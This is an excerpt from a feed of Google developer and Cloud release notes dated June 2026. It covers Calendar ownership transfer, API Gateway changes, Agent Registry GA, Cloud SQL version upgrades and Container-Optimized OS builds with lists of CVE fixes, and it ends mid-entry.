&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Are you ready to build anything? We’ve officially launched the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;#NapkinChallenge&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. Take a handwritten sketch of an app idea, use Antigravity 2.0 to build it, and share your creation on social media.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Try Antigravity 2.0:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://goo.gle/4fnXilj" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;antigravity.google&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Join the Challenge:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://goo.gle/4e0AGF6" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Napkin Challenge Details&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Rody’s personal &lt;/strong&gt;&lt;a href="https://rodydavis.com/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;website&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://github.com/rodydavis/rodydavis" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;github repo&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://github.com/rodydavis/skills" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;skills&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Connect with us&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Rody Davis&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; → &lt;/span&gt;&lt;a href="https://goo.gle/Rody-on-X" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://goo.gle/Rody-on-LinkedIn" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Shir Meir Lador&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; → &lt;/span&gt;&lt;a href="https://goo.gle/Shir-on-X" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;X&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://goo.gle/Shir-on-LinkedIn" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;LinkedIn&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/agent-factory-recap-100x-engineering-with-ai-agents-in-google-antigravity-20" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/calendar/docs/release-notes#June_18_2026</id>
    <title>Calendar API — June 18, 2026</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; Workspace administrators can now use the Google Calendar API to programmatically transfer the ownership of secondary calendars between users within the same organization.&lt;/p&gt;
&lt;p&gt;To learn more, see the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendars/transferOwnership"&gt;&lt;code&gt;Calendars.transferOwnership&lt;/code&gt;&lt;/a&gt; method documentation.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/calendar/docs/release-notes#June_18_2026" rel="alternate"/>
    <category term="Calendar API"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#June_18_2026</id>
    <title>Workspace Release Notes — June 18, 2026</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google Calendar API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available:&lt;/strong&gt; Workspace administrators can now use the Google Calendar API to programmatically transfer the ownership of secondary calendars between users within the same organization.&lt;/p&gt;
&lt;p&gt;To learn more, see the &lt;a href="https://developers.google.com/workspace/calendar/api/v3/reference/calendars/transferOwnership"&gt;&lt;code&gt;Calendars.transferOwnership&lt;/code&gt;&lt;/a&gt; method documentation.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#June_18_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-06-18T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_18_2026</id>
    <title>Cloud Release Notes — June 18, 2026</title>
    <updated>2026-06-18T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;API Gateway&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Update to the API Gateway runtime architecture&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The API Gateway runtime architecture is being updated to improve its integration
with Google Cloud Platform and its services.&lt;/p&gt;
&lt;p&gt;This update does not affect existing API Gateway features.
However, be aware of the following differences:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Status code changes for &lt;strong&gt;gRPC&lt;/strong&gt; API Gateways
&lt;table&gt;
&lt;tr&gt;
&lt;th&gt;Error&lt;/th&gt;
&lt;th&gt;New status code&lt;/th&gt;
&lt;th&gt;Previous status code&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Quota exceeded&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ResourceExhausted&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Unavailable&lt;/code&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Invalid API key&lt;/td&gt;
&lt;td&gt;&lt;code&gt;InvalidArgument&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;InternalError&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;For 4xx client-side quota failures, API Gateway will now reject requests
(fail closed). This applies to both &lt;strong&gt;gRPC&lt;/strong&gt; and &lt;strong&gt;OpenAPI&lt;/strong&gt; API Gateways.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you experience any other differences in behavior due to this update, contact &lt;a href="https://cloud.google.com/support-hub"&gt;Google
Cloud Customer Care&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: Rollouts of this release to production instances might take up to 4 weeks to complete
across all Google Cloud zones. Your instances might not be updated until the rollout is complete.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Agent Registry&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Agent Registry is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available (GA)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The following are features available in Agent Registry for the GA launch stage:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;API v1 and client libraries:&lt;/strong&gt; The &lt;code&gt;v1&lt;/code&gt; version of the Agent Registry API is available. Cloud client libraries are available in C#, Go, Java, Node.js, PHP, Python, and Ruby.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A2A v1 support:&lt;/strong&gt; Agent Registry supports Agent-to-Agent (A2A) protocol version &lt;code&gt;1.0&lt;/code&gt;, letting you explicitly declare transport endpoints and bindings inside the &lt;code&gt;supportedInterfaces&lt;/code&gt; array, in addition to the existing &lt;code&gt;0.3&lt;/code&gt; schema support.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Terraform support:&lt;/strong&gt; Terraform scripts for Application Default Credentials (ADC) have graduated to General Availability. You can use Terraform to configure and manage your agents, MCP servers, endpoints, and bindings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Known limitations:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Access Transparency and Access Approval:&lt;/strong&gt; &lt;a href="https://docs.cloud.google.com/assured-workloads/access-transparency/docs/overview"&gt;Access Transparency&lt;/a&gt; logs, which provide visibility into when Google personnel access your content, and &lt;a href="https://docs.cloud.google.com/assured-workloads/access-approval/docs/overview"&gt;Access Approval&lt;/a&gt; controls aren't available for Agent Registry configurations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Residency:&lt;/strong&gt; If you configure the &lt;a href="https://docs.cloud.google.com/organization-policy/restrict-locations"&gt;resource location constraint&lt;/a&gt; in your organization policy, Agent Registry enforces the constraint when you register a resource. However, detective controls for data residency compliance reporting are limited.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Apigee X&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;On June 18th, 2026, we began maintenance updates of Apigee instances &lt;a href="https://docs.cloud.google.com/apigee/docs/api-platform/system-administration/maintenance-windows"&gt;configured for maintenance windows&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you set a preferred window for maintenance for your instance, and your instance version is
below &lt;strong&gt;1-17-0-apigee-9&lt;/strong&gt;, your instance will be updated to &lt;strong&gt;1-17-0-apigee-9&lt;/strong&gt; within the
next seven to 21 days. A notification containing the expected date of upgrade will be sent within the next two business days.&lt;/p&gt;
&lt;aside class="note"&gt;Note: Instances that meet either of the following two criteria will &lt;b&gt;not&lt;/b&gt; be updated:
&lt;ul&gt;
&lt;li&gt;Your instance has a DNS misconfiguration, as described in &lt;a href="https://docs.cloud.google.com/apigee/docs/release/known-issues"&gt;Known Issue 445936920&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Your instance uses an Apigee Java Library that has been removed, as described in &lt;a href="https://docs.cloud.google.com/apigee/docs/release/release-notes#October_16_2025"&gt;Apigee release notes dated October 16, 2025&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;&lt;/aside&gt;
&lt;p&gt;For more information on participating in scheduled maintenance windows, see &lt;a href="https://docs.cloud.google.com/apigee/docs/api-platform/system-administration/maintenance"&gt;Maintenance overview&lt;/a&gt; and &lt;a href="https://docs.cloud.google.com/apigee/docs/api-platform/system-administration/maintenance-windows"&gt;Manage Apigee instance maintenance windows&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Backup and DR&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Backup vault support for Cloud SQL instances encrypted with customer-managed encryption keys (CMEK) is generally available (GA), providing immutable and indelible storage with enforced retention. For more information, see &lt;a href="https://docs.cloud.google.com/backup-disaster-recovery/docs/cloud-console/sql/csql-backup"&gt;Back up Cloud SQL instances to a backup vault&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Logging&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;The Cloud Logging API adds support for the &lt;code&gt;ca&lt;/code&gt; regional endpoint. For a
complete list of regional endpoints, see the
&lt;a href="https://docs.cloud.google.com/logging/docs/reference/v2/rest?rep_location=global"&gt;REST reference pages&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for MySQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Cloud SQL for MySQL now supports minor version
&lt;a href="https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-46.html"&gt;8.0.46&lt;/a&gt;.
To upgrade your existing instance to the new minor version, see
&lt;a href="https://docs.cloud.google.com/sql/docs/mysql/upgrade-minor-db-version#manual-upgrade"&gt;Upgrade the database minor version&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud SQL for PostgreSQL&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Cloud SQL is integrated with &lt;a href="https://ai.google.dev/aistudio"&gt;Google AI Studio&lt;/a&gt;
to help you build full-stack applications that use a
&lt;a href="https://docs.cloud.google.com/sql/docs/postgres/ai-assisted-coding-and-cloud-sql#cloud-sql-configuration-in-starter-tier"&gt;Cloud SQL for PostgreSQL developer edition&lt;/a&gt;
instance as the database. You can enter natural language
prompts in the Google AI Studio to build applications backed by Cloud SQL and
add features such as authentication, search, and persistent data storage.&lt;/p&gt;
&lt;p&gt;For more information, see
&lt;a href="https://docs.cloud.google.com/sql/docs/postgres/ai-assisted-coding-and-cloud-sql"&gt;Build vibe-coded applications using Google AI Studio and Cloud SQL&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This feature is generally available (&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;GA&lt;/a&gt;).&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The rollout of the following Cloud SQL for PostgreSQL
minor version and extension upgrades is complete:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Minor versions&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;14.22 is upgraded to 14.23.&lt;/li&gt;
&lt;li&gt;15.17 is upgraded to 15.18.&lt;/li&gt;
&lt;li&gt;16.13 is upgraded to 16.14.&lt;/li&gt;
&lt;li&gt;17.9 is upgraded to 17.10.&lt;/li&gt;
&lt;li&gt;18.3 is upgraded to 18.4.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The new maintenance version is &lt;a href="https://docs.cloud.google.com/sql/docs/postgres/maintenance-changelog"&gt;&lt;code&gt;[PostgreSQL version].R20260319.07_04&lt;/code&gt;&lt;/a&gt;.
To apply the new maintenance version, see
&lt;a href="https://docs.cloud.google.com/sql/docs/postgres/self-service-maintenance"&gt;Perform self-service maintenance&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Trace&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can collect, view, and analyze multimodal prompts and responses from
your agentic applications that use the LangGraph or Agent Development Kit (ADK)
frameworks. This feature is
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally available (GA)&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/instrumentation/ai-agent-overview"&gt;Instrument generative AI applications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/trace/docs/collect-view-multimodal-prompts-responses"&gt;Collect and view multimodal prompts and responses&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Container Optimized OS&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-129-19506-224-49_"&gt;cos-129-19506-224-49 &lt;a id="&amp;quot;cos-arm64-129-19506-224-49&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/fd31f7d8b65031d8f8a98c7aafc59c84a831dfc0"&gt;COS-6.12.90&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.2.3&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19506.224.49/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated oslogin to v20260605.00.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded app-admin/logrotate to v3.22.0-r1.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;Upgraded sys-apps/less to v704.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-41567 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-41568 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-42306 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46160 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46315 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46321 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46322 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46323 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-50195, CVE-2026-53488, CVE-2026-53492, CVE-2026-53489, and CVE-2026-47262 in app-containers/containerd.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-125-19216-395-109_"&gt;cos-125-19216-395-109 &lt;a id="&amp;quot;cos-arm64-125-19216-395-109&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/1dd147644c2ffa2b98ed57056012bfed5c2d2190"&gt;COS-6.12.85&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.1.7&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/19216.395.109/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated oslogin to v20260605.00.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-41568 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-415687 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-42306 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46315 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46321 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46322 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46323 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-50195, CVE-2026-53488, CVE-2026-53492, CVE-2026-53489, and CVE-2026-47262 in app-containers/containerd.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Runtime sysctl changes:
&lt;ul&gt;
&lt;li&gt;Changed: net.ipv4.udp_mem: 188034   250715  376068 -&amp;gt; 188034    250714  376068&lt;/li&gt;
&lt;/ul&gt;&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-117-18613-613-61_"&gt;cos-117-18613-613-61 &lt;a id="&amp;quot;cos-arm64-117-18613-613-61&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/6baf9cd9b87dc7ebfbc0bf533cef571e4fbcf31e"&gt;COS-6.6.137&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v24.0.9&lt;/td&gt;
&lt;td&gt;v1.7.31&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/18613.613.61/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated oslogin to v20260605.00.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-41567 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-41568 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fix CVE-2026-42306 in app-containers/docker.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2025-13462 in dev-lang/python.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46323 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-50195, CVE-2026-53488, CVE-2026-53492, CVE-2026-53489, and CVE-2026-47262 in app-containers/containerd.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h3 id="cos-121-18867-381-183_"&gt;cos-121-18867-381-183 &lt;a id="&amp;quot;cos-arm64-121-18867-381-183&amp;quot;/"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;table class="pkg"&gt;
&lt;tr&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Docker&lt;/td&gt;
&lt;td&gt;Containerd&lt;/td&gt;
&lt;td&gt;&lt;a href="https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus"&gt;GPU Drivers&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href="https://cos.googlesource.com/third_party/kernel/+/0cf599aaec4ef39b7c8fddb48963b257e7b1e3c7"&gt;COS-6.6.137&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;v27.5.1&lt;/td&gt;
&lt;td&gt;v2.0.8&lt;/td&gt;
&lt;td&gt;&lt;a href="https://storage.googleapis.com/cos-tools/18867.381.183/lakitu/gpu_driver_versions.textproto"&gt;See List&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Updated oslogin to v20260605.00.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-46323 in the Linux kernel.&lt;/p&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Fixed CVE-2026-50195, CVE-2026-53488, CVE-2026-53492, CVE-2026-53489, and CVE-2026-47262 in app-containers/containerd.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Data Studio&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Viewer data refresh&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Report editors can now allow report viewers to manually refresh report data. When editors enable the new &lt;strong&gt;Viewer data refresh&lt;/strong&gt; option in &lt;a href="https://docs.cloud.google.com/data-studio/report-settings#viewer-data-refresh"&gt;report settings&lt;/a&gt;, viewers can refresh data for a component by right clicking the component, or refresh data for a report by selecting the option in the three-dot menu.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: Workflow agents (GA with allowlist)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can create, import, update, and use workflow agents in the Gemini Enterprise
web app. These agents are designed to execute a sequence of
steps or actions, which can include a mix of AI automation and human intervention, based on a
configured trigger.&lt;/p&gt;
&lt;p&gt;This feature is available as a GA with allowlist. To access this feature,
contact your Google account manager. After your Google Cloud project is added to
the allowlist, a Gemini Enterprise administrator must turn on the &lt;strong&gt;Enable agent designer&lt;/strong&gt;
toggle in the web app feature management settings to let users use it.&lt;/p&gt;
&lt;p&gt;For more information, see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/manage-web-app-features"&gt;Manage web app
features&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
